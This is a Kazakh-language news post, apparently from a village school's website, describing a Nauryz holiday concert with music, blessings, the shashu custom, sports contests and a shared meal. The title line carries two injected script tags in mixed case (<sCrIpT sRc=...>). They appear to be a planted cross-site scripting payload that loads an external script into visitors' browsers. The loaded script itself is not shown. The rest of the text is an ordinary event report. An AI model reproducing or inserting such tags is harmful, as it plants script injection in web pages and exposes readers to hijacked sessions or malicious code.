2023 жылдың 21 –ші Наурыз күні Саздыбұлақ ауылының ЖОББ мектебінде «Армысың, әз Наурыз!» атты мерекелік концерт<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

31.03.2023

  2023 жылдың  21 –ші Наурыз  күні  Саздыбұлақ ауылының ЖОББ мектебінде «Армысың,  әз Наурыз!» атты  мерекелік  концерт  болып өтті. Мақсаты: «Наурыз» мейрамы туралы түсінік беру арқылы қазақ халқының салт - дәстүрін көрсету және оны құрметтей білуге тәрбиелеу.  Мерекелік думанды көруге ұстаздар, оқушылар, ауылдың қариялары, ақ жаулықты аналары, ауылдың  жастары,  яғни ауылдың тұрғындары  шақырылды.  22  Наурыз -Ұлыстың Ұлы күніне арнап  өткізілген  мерекелік  іс-шара   оқушыларымыздың  күй  тартуымен   ашылып,  мектеп  директоы  Хадыр  Мұратбектің  барша жұртты  Наурыз мерекесімен құттықтап,  жылы лебізін  білдіріп,  ауылдың  құрметті  ақсақалы  Болат  Мағауияұлының  барша жұртқа  бата  беруімен  басталды.  Сондай-ақ,  Наурыз  тойының  ерекше  салты – «шашу  шашу»  болғандықтан  ауылдың қадірлі  аналары  шашу шашып жиналған қауымды бір  қуантып  тастады.  Келесі  кезекте қонақтар мектеп оқушылары мен ұстаздарының және  ауыл  жастарының  дайындаған  ән-күй өнерлерін  тамашалап,  одан  қалса  спорттық  ойындар түрлері - қол күресі мен  гір көтеру жарысына қатысып, бір-бірінен оза  шауып  жеңімпаз атанып,   барша  қауым  мәз-мейрам болып жатты.  Барша жиналған қауым, ауылдағы  аталар мен  әжелер  Наурыз мейрамының  сәнін кіргізетін ерекше ас-  «Наурыз  көже»  ішіп,  дастарханнан дәм татып, баталарын беріп, тарқасып жатты. Ауыл жастары болса,  спорттық  алаңда  спорттық ойындардың  жарысын тамашалап, Наурыз  мейрамын ерекше  атап  өтті.

Просмотров: 1577


Пікір қосу



Деректерді қолтаңбаға қосу